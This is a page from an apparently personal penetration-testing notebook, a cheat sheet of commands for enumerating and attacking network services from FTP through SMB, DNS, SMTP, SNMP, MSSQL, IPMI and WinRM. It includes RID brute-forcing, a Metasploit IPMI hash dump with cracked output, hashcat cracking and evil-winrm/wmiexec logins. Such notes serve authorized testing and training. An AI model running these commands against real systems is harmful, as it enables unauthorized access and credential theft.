📖
sheepwall
  • Overview
  • Cloud Hacking
    • Azure
  • Hacking
    • Recon
      • Nmap
      • Website Recon
      • Service Enumeration
    • Exploitation
      • GraphQL
      • Application Attacks
      • Web Server Attacks
      • JSON attacks
      • CMS attacks
      • SQL Injection
      • Cross Site Scripting
      • Command Injection
      • SSRF
      • SSTI
      • Server Includes
      • XXE
      • WSDL/SOAP
      • Serialization Attacks
      • Cryptography
      • JWT
    • Installation
      • File Uploads
      • File Transfers
    • Actions on Objectives
      • Networking
      • Linux
    • Tools
    • Windows
      • 1. Getting Foothold
      • 2. Windows Exploitation
      • 3. Enumerating Active Directory
      • 4. Dumping Credentials
      • 5. Lateral Movement
      • 6. Persistence
      • 7. Active Directory
      • 8. LAPS
  • Bug Bounties
    • SSRF to Envoy Admin Page
    • Leaky Error Messages
    • HTTP verb tampering results in administrator role to the application
  • APT Information
    • DFIR Summary
Powered by GitBook
On this page
  • FTP
  • SMB
  • NFS
  • DNS
  • SMTP
  • SNMP
  • MySQL
  • MSSQL
  • IPMI
  • RDP (Windows)
  • WinRM (Windows)
  • WMI
  1. Hacking
  2. Recon

Service Enumeration

Enumerating the services on target

FTP

Ports: TCP 20, 21

Check for anonymous logins

Downloading all files from FTP using wget

$ wget -m --no-passive ftp://anonymous:anonymous@SERVER

Connect to FTP using SSL

$ openssl s_client -connect SERVER:21 -starttls ftp

SMB

Ports: TCP 139, 445

Check for anonymous logins

Listing SMB shares

$ smbclient -N -L //SERVER -U="<username>" --password="<password>"

Connecting to a SMB share

$ smbclient //SERVER/notes -U="<username>" --password="<password>"

Connect to an SMB share using RPC

$ rpcclient -U "<username>" 10.129.14.128
RPC Query
Description

srvinfo

Server information

enumdomains

Enumerate all domains that are deployed in the network

querydominfo

Provides domain, server, and user information of deployed domains

netshareenumall

Enumerates all available shares

netsharegetinfo <SHARE>

Provides information about a specific share

enumdomusers

Enumerates all domain users

queryuser <USER_RID>

Provides information about a specific user

querygroup <GROUP_RID>

Provides information about a group

Brute Forcing Users RID

$ for i in $(seq 500 1100);do rpcclient -N -U "" SERVER -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

NFS

Ports: TCP/UDP 2049, 111

Show available NFS share

$ showmount -e <TARGET IP>

Mounting NFS share

$ mount -t nfs <TARGET IP>:/<share name> ./<local folder>/ -o nolock

DNS

Port: UDP 53, TCP 53 for zone transfers

Get all record from a DNS server

$ dig any <hostname> @<IP>

Zone Transfer

This can be done recursively after discovering more subdomains

$ dig axfr <hostname> @<IP>

Brute force subdomains given a DNS server

This can be done recursively after discovering more subdomains

$ dnsenum --dnsserver <IP> --enum -p 0 -s 0 -f <wordlist> <domain>

SMTP

Ports: TCP 25, 465, 587, 2525

SMTP Open Relay Scanning with nmap

$ sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v

SMTP user enumeration

$ smtp-user-enum -M VRFY -U <usernames.txt> -t <TARGET IP> -w <wait time>
$ smtp-user-enum -M EXPN -U <usernames.txt> -t <TARGET IP> -w <wait time>
$ smtp-user-enum -M RCPT -U <usernames.txt> -t <TARGET IP> -w <wait time>

Evolution Mail Client

Once you have credentials for a valid account, install evolution and setup the account to that user

$ sudo apt install evolution

SNMP

Ports: UDP 161

SNMPwalk to enumerate SNMP service

$ snmpwalk -v2c -c <string> <TARGET IP>

Onesixtyone to brute force string

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET IP>

MySQL

Ports: TCP 3306

Nmap script

$ sudo nmap <TARGET IP> -sV -sC -p3306 --script mysql*

MSSQL

Nmap script

$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET IP>

Connecting to MSSQL with python

$ python3 mssqlclient.py Administrator@<TARGET IP> -windows-auth

IPMI

Ports: UDP 623

Metasploit Dumping IPMI hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                 Current Setting                                                    Required  Description
   ----                 ---------------                                                    --------  -----------
   CRACK_COMMON         true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                     no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                        no        Save captured password hashes in john the ripper format
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS               10.129.42.195                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                623                                                                yes       The target port
   THREADS              1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line



msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

hashcat to crack HP iLO ipmi passwords

$ hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

hashcat to crack generic ipmi passwords

$ hashcat -m 7300 --username hash <wordlist>

RDP (Windows)

Ports: TCP 3389

Nmap script

$ nmap -sV -sC <TARGET IP> -p3389 --script rdp*

Connecting to RDP service

$ xfreerdp /u:cry0l1t3 /p:"<password>" /v:<TARGET IP>

WinRM (Windows)

Ports: TCP 5985, 5986

Nmap script

$ nmap -sV -sC <TARGET IP> -p5985,5986 --disable-arp-ping -n

evil-winrm

$ evil-winrm -i <TARGET IP> -u <username> -p <password>

WMI

Ports: TCP 135

wmiexec

$ /usr/share/doc/python3-impacket/examples/wmiexec.py Cry0l1t3:"P455w0rD!"@10.129.201.248 "hostname"

PreviousWebsite ReconNextExploitation

Last updated 2 years ago

Or by using samrdump:

Download the impacket mssql connector

https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py
https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py
https://github.com/Hackplayers/evil-winrm
https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py